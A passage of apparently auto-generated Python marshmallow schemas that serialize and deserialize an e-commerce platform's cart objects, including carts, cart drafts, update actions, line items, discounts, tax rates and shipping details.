missing=None,
data_key="taxRoundingMode",
)
tax_calculation_mode = marshmallow_enum.EnumField(
TaxCalculationMode,
by_value=True,
allow_none=True,
missing=None,
data_key="taxCalculationMode",
)
customer_group = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".customer_group.CustomerGroupReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="customerGroup",
)
country = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
shipping_info = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ShippingInfoSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingInfo",
)
discount_codes = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".DiscountCodeInfoSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="discountCodes",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.CustomFieldsSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
payment_info = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".order.PaymentInfoSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="paymentInfo",
)
locale = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
delete_days_after_last_modification = marshmallow.fields.Integer(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="deleteDaysAfterLastModification",
)
refused_gifts = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".cart_discount.CartDiscountReferenceSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="refusedGifts",
)
origin = marshmallow_enum.EnumField(
CartOrigin, by_value=True, allow_none=True, missing=None
)
shipping_rate_input = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"Classification": helpers.absmod(
__name__, ".ClassificationShippingRateInputSchema"
),
"Score": helpers.absmod(__name__, ".ScoreShippingRateInputSchema"),
},
metadata={"omit_empty": True},
missing=None,
data_key="shippingRateInput",
)
item_shipping_addresses = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="itemShippingAddresses",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.Cart(**data)
class CartDraftSchema(helpers.BaseSchema):
currency = marshmallow.fields.String(allow_none=True, missing=None)
customer_id = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="customerId",
)
customer_email = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="customerEmail",
)
customer_group = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".customer_group.CustomerGroupResourceIdentifierSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="customerGroup",
)
anonymous_id = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="anonymousId",
)
store = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".store.StoreResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
country = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
inventory_mode = marshmallow_enum.EnumField(
InventoryMode,
by_value=True,
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="inventoryMode",
)
tax_mode = marshmallow_enum.EnumField(
TaxMode,
by_value=True,
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="taxMode",
)
tax_rounding_mode = marshmallow_enum.EnumField(
RoundingMode,
by_value=True,
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="taxRoundingMode",
)
tax_calculation_mode = marshmallow_enum.EnumField(
TaxCalculationMode,
by_value=True,
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="taxCalculationMode",
)
line_items = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".LineItemDraftSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="lineItems",
)
custom_line_items = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".CustomLineItemDraftSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="customLineItems",
)
shipping_address = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingAddress",
)
billing_address = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="billingAddress",
)
shipping_method = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".shipping_method.ShippingMethodResourceIdentifierSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingMethod",
)
external_tax_rate_for_shipping_method = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRateForShippingMethod",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
locale = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
delete_days_after_last_modification = marshmallow.fields.Integer(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="deleteDaysAfterLastModification",
)
origin = marshmallow_enum.EnumField(
CartOrigin,
by_value=True,
allow_none=True,
metadata={"omit_empty": True},
missing=None,
)
shipping_rate_input = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"Classification": helpers.absmod(
__name__, ".ClassificationShippingRateInputDraftSchema"
),
"Score": helpers.absmod(__name__, ".ScoreShippingRateInputDraftSchema"),
},
metadata={"omit_empty": True},
missing=None,
data_key="shippingRateInput",
)
item_shipping_addresses = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="itemShippingAddresses",
)
discount_codes = marshmallow.fields.List(
marshmallow.fields.String(allow_none=True),
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="discountCodes",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.CartDraft(**data)
class CartPagedQueryResponseSchema(helpers.BaseSchema):
limit = marshmallow.fields.Integer(allow_none=True, missing=None)
count = marshmallow.fields.Integer(allow_none=True, missing=None)
total = marshmallow.fields.Integer(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
offset = marshmallow.fields.Integer(allow_none=True, missing=None)
results = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".CartSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.CartPagedQueryResponse(**data)
class CartReferenceSchema(ReferenceSchema):
obj = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".CartSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["type_id"]
return models.CartReference(**data)
class CartResourceIdentifierSchema(ResourceIdentifierSchema):
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["type_id"]
return models.CartResourceIdentifier(**data)
class CartUpdateSchema(helpers.BaseSchema):
version = marshmallow.fields.Integer(allow_none=True, missing=None)
actions = marshmallow.fields.List(
helpers.Discriminator(
allow_none=True,
discriminator_field=("action", "action"),
discriminator_schemas={
"addCustomLineItem": helpers.absmod(
__name__, ".CartAddCustomLineItemActionSchema"
),
"addDiscountCode": helpers.absmod(
__name__, ".CartAddDiscountCodeActionSchema"
),
"addItemShippingAddress": helpers.absmod(
__name__, ".CartAddItemShippingAddressActionSchema"
),
"addLineItem": helpers.absmod(__name__, ".CartAddLineItemActionSchema"),
"addPayment": helpers.absmod(__name__, ".CartAddPaymentActionSchema"),
"addShoppingList": helpers.absmod(
__name__, ".CartAddShoppingListActionSchema"
),
"applyDeltaToCustomLineItemShippingDetailsTargets": helpers.absmod(
__name__,
".CartApplyDeltaToCustomLineItemShippingDetailsTargetsActionSchema",
),
"applyDeltaToLineItemShippingDetailsTargets": helpers.absmod(
__name__,
".CartApplyDeltaToLineItemShippingDetailsTargetsActionSchema",
),
"changeCustomLineItemMoney": helpers.absmod(
__name__, ".CartChangeCustomLineItemMoneyActionSchema"
),
"changeCustomLineItemQuantity": helpers.absmod(
__name__, ".CartChangeCustomLineItemQuantityActionSchema"
),
"changeLineItemQuantity": helpers.absmod(
__name__, ".CartChangeLineItemQuantityActionSchema"
),
"changeTaxCalculationMode": helpers.absmod(
__name__, ".CartChangeTaxCalculationModeActionSchema"
),
"changeTaxMode": helpers.absmod(
__name__, ".CartChangeTaxModeActionSchema"
),
"changeTaxRoundingMode": helpers.absmod(
__name__, ".CartChangeTaxRoundingModeActionSchema"
),
"recalculate": helpers.absmod(__name__, ".CartRecalculateActionSchema"),
"removeCustomLineItem": helpers.absmod(
__name__, ".CartRemoveCustomLineItemActionSchema"
),
"removeDiscountCode": helpers.absmod(
__name__, ".CartRemoveDiscountCodeActionSchema"
),
"removeItemShippingAddress": helpers.absmod(
__name__, ".CartRemoveItemShippingAddressActionSchema"
),
"removeLineItem": helpers.absmod(
__name__, ".CartRemoveLineItemActionSchema"
),
"removePayment": helpers.absmod(
__name__, ".CartRemovePaymentActionSchema"
),
"setAnonymousId": helpers.absmod(
__name__, ".CartSetAnonymousIdActionSchema"
),
"setBillingAddress": helpers.absmod(
__name__, ".CartSetBillingAddressActionSchema"
),
"setCartTotalTax": helpers.absmod(
__name__, ".CartSetCartTotalTaxActionSchema"
),
"setCountry": helpers.absmod(__name__, ".CartSetCountryActionSchema"),
"setCustomField": helpers.absmod(
__name__, ".CartSetCustomFieldActionSchema"
),
"setCustomLineItemCustomField": helpers.absmod(
__name__, ".CartSetCustomLineItemCustomFieldActionSchema"
),
"setCustomLineItemCustomType": helpers.absmod(
__name__, ".CartSetCustomLineItemCustomTypeActionSchema"
),
"setCustomLineItemShippingDetails": helpers.absmod(
__name__, ".CartSetCustomLineItemShippingDetailsActionSchema"
),
"setCustomLineItemTaxAmount": helpers.absmod(
__name__, ".CartSetCustomLineItemTaxAmountActionSchema"
),
"setCustomLineItemTaxRate": helpers.absmod(
__name__, ".CartSetCustomLineItemTaxRateActionSchema"
),
"setCustomShippingMethod": helpers.absmod(
__name__, ".CartSetCustomShippingMethodActionSchema"
),
"setCustomType": helpers.absmod(
__name__, ".CartSetCustomTypeActionSchema"
),
"setCustomerEmail": helpers.absmod(
__name__, ".CartSetCustomerEmailActionSchema"
),
"setCustomerGroup": helpers.absmod(
__name__, ".CartSetCustomerGroupActionSchema"
),
"setCustomerId": helpers.absmod(
__name__, ".CartSetCustomerIdActionSchema"
),
"setDeleteDaysAfterLastModification": helpers.absmod(
__name__, ".CartSetDeleteDaysAfterLastModificationActionSchema"
),
"setKey": helpers.absmod(__name__, ".CartSetKeyActionSchema"),
"setLineItemCustomField": helpers.absmod(
__name__, ".CartSetLineItemCustomFieldActionSchema"
),
"setLineItemCustomType": helpers.absmod(
__name__, ".CartSetLineItemCustomTypeActionSchema"
),
"setLineItemDistributionChannel": helpers.absmod(
__name__, ".CartSetLineItemDistributionChannelActionSchema"
),
"setLineItemPrice": helpers.absmod(
__name__, ".CartSetLineItemPriceActionSchema"
),
"setLineItemShippingDetails": helpers.absmod(
__name__, ".CartSetLineItemShippingDetailsActionSchema"
),
"setLineItemTaxAmount": helpers.absmod(
__name__, ".CartSetLineItemTaxAmountActionSchema"
),
"setLineItemTaxRate": helpers.absmod(
__name__, ".CartSetLineItemTaxRateActionSchema"
),
"setLineItemTotalPrice": helpers.absmod(
__name__, ".CartSetLineItemTotalPriceActionSchema"
),
"setLocale": helpers.absmod(__name__, ".CartSetLocaleActionSchema"),
"setShippingAddress": helpers.absmod(
__name__, ".CartSetShippingAddressActionSchema"
),
"setShippingMethod": helpers.absmod(
__name__, ".CartSetShippingMethodActionSchema"
),
"setShippingMethodTaxAmount": helpers.absmod(
__name__, ".CartSetShippingMethodTaxAmountActionSchema"
),
"setShippingMethodTaxRate": helpers.absmod(
__name__, ".CartSetShippingMethodTaxRateActionSchema"
),
"setShippingRateInput": helpers.absmod(
__name__, ".CartSetShippingRateInputActionSchema"
),
"updateItemShippingAddress": helpers.absmod(
__name__, ".CartUpdateItemShippingAddressActionSchema"
),
},
),
allow_none=True,
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.CartUpdate(**data)
class CartUpdateActionSchema(helpers.BaseSchema):
action = marshmallow.fields.String(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartUpdateAction(**data)
class CustomLineItemSchema(helpers.BaseSchema):
id = marshmallow.fields.String(allow_none=True, missing=None)
name = LocalizedStringField(allow_none=True, missing=None)
money = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
)
taxed_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".TaxedItemPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxedPrice",
)
total_price = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
data_key="totalPrice",
)
slug = marshmallow.fields.String(allow_none=True, missing=None)
quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
state = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".order.ItemStateSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
tax_category = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".tax_category.TaxCategoryReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxCategory",
)
tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".tax_category.TaxRateSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxRate",
)
discounted_price_per_quantity = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".DiscountedLineItemPriceForQuantitySchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="discountedPricePerQuantity",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.CustomFieldsSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
shipping_details = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingDetailsSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingDetails",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.CustomLineItem(**data)
class CustomLineItemDraftSchema(helpers.BaseSchema):
name = LocalizedStringField(allow_none=True, missing=None)
quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
money = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
slug = marshmallow.fields.String(allow_none=True, missing=None)
tax_category = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".tax_category.TaxCategoryResourceIdentifierSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxCategory",
)
external_tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRate",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
shipping_details = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingDetails",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.CustomLineItemDraft(**data)
class DiscountCodeInfoSchema(helpers.BaseSchema):
discount_code = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".discount_code.DiscountCodeReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="discountCode",
)
state = marshmallow_enum.EnumField(
DiscountCodeState, by_value=True, allow_none=True, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.DiscountCodeInfo(**data)
class DiscountedLineItemPortionSchema(helpers.BaseSchema):
discount = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".cart_discount.CartDiscountReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
discounted_amount = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
data_key="discountedAmount",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.DiscountedLineItemPortion(**data)
class DiscountedLineItemPriceSchema(helpers.BaseSchema):
value = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
)
included_discounts = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".DiscountedLineItemPortionSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="includedDiscounts",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.DiscountedLineItemPrice(**data)
class DiscountedLineItemPriceForQuantitySchema(helpers.BaseSchema):
quantity = marshmallow.fields.Float(allow_none=True, missing=None)
discounted_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".DiscountedLineItemPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="discountedPrice",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.DiscountedLineItemPriceForQuantity(**data)
class ExternalLineItemTotalPriceSchema(helpers.BaseSchema):
price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
total_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="totalPrice",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.ExternalLineItemTotalPrice(**data)
class ExternalTaxAmountDraftSchema(helpers.BaseSchema):
total_gross = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="totalGross",
)
tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="taxRate",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.ExternalTaxAmountDraft(**data)
class ExternalTaxRateDraftSchema(helpers.BaseSchema):
name = marshmallow.fields.String(allow_none=True, missing=None)
amount = marshmallow.fields.Float(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
country = marshmallow.fields.String(allow_none=True, missing=None)
state = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
sub_rates = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".tax_category.SubRateSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="subRates",
)
included_in_price = marshmallow.fields.Boolean(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="includedInPrice",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.ExternalTaxRateDraft(**data)
class ItemShippingDetailsSchema(helpers.BaseSchema):
targets = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingTargetSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
valid = marshmallow.fields.Boolean(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.ItemShippingDetails(**data)
class ItemShippingDetailsDraftSchema(helpers.BaseSchema):
targets = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingTargetSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.ItemShippingDetailsDraft(**data)
class ItemShippingTargetSchema(helpers.BaseSchema):
address_key = marshmallow.fields.String(
allow_none=True, missing=None, data_key="addressKey"
)
quantity = marshmallow.fields.Float(allow_none=True, missing=None)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.ItemShippingTarget(**data)
class LineItemSchema(helpers.BaseSchema):
id = marshmallow.fields.String(allow_none=True, missing=None)
product_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="productId"
)
name = LocalizedStringField(allow_none=True, missing=None)
product_slug = LocalizedStringField(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="productSlug",
)
product_type = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".product_type.ProductTypeReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="productType",
)
variant = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".product.ProductVariantSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.PriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
taxed_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".TaxedItemPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxedPrice",
)
total_price = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"centPrecision": helpers.absmod(
__name__, ".common.CentPrecisionMoneySchema"
),
"highPrecision": helpers.absmod(
__name__, ".common.HighPrecisionMoneySchema"
),
},
missing=None,
data_key="totalPrice",
)
quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
added_at = marshmallow.fields.DateTime(
allow_none=True, metadata={"omit_empty": True}, missing=None, data_key="addedAt"
)
state = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".order.ItemStateSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".tax_category.TaxRateSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxRate",
)
supply_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".channel.ChannelReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="supplyChannel",
)
distribution_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".channel.ChannelReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="distributionChannel",
)
discounted_price_per_quantity = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".DiscountedLineItemPriceForQuantitySchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
missing=None,
data_key="discountedPricePerQuantity",
)
price_mode = marshmallow_enum.EnumField(
LineItemPriceMode,
by_value=True,
allow_none=True,
missing=None,
data_key="priceMode",
)
line_item_mode = marshmallow_enum.EnumField(
LineItemMode,
by_value=True,
allow_none=True,
missing=None,
data_key="lineItemMode",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.CustomFieldsSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
shipping_details = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingDetailsSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingDetails",
)
last_modified_at = marshmallow.fields.DateTime(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="lastModifiedAt",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.LineItem(**data)
class LineItemDraftSchema(helpers.BaseSchema):
product_id = marshmallow.fields.String(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="productId",
)
variant_id = marshmallow.fields.Integer(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="variantId",
)
sku = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
quantity = marshmallow.fields.Integer(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
added_at = marshmallow.fields.DateTime(
allow_none=True, metadata={"omit_empty": True}, missing=None, data_key="addedAt"
)
supply_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="supplyChannel",
)
distribution_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="distributionChannel",
)
external_tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRate",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
external_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalPrice",
)
external_total_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTotalPrice",
)
shipping_details = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingDetails",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.LineItemDraft(**data)
class ReplicaCartDraftSchema(helpers.BaseSchema):
reference = helpers.Discriminator(
allow_none=True,
discriminator_field=("typeId", "type_id"),
discriminator_schemas={
"cart-discount": helpers.absmod(
__name__, ".cart_discount.CartDiscountReferenceSchema"
),
"cart": helpers.absmod(__name__, ".CartReferenceSchema"),
"category": helpers.absmod(__name__, ".category.CategoryReferenceSchema"),
"channel": helpers.absmod(__name__, ".channel.ChannelReferenceSchema"),
"key-value-document": helpers.absmod(
__name__, ".custom_object.CustomObjectReferenceSchema"
),
"customer-group": helpers.absmod(
__name__, ".customer_group.CustomerGroupReferenceSchema"
),
"customer": helpers.absmod(__name__, ".customer.CustomerReferenceSchema"),
"discount-code": helpers.absmod(
__name__, ".discount_code.DiscountCodeReferenceSchema"
),
"inventory-entry": helpers.absmod(
__name__, ".inventory.InventoryEntryReferenceSchema"
),
"order-edit": helpers.absmod(
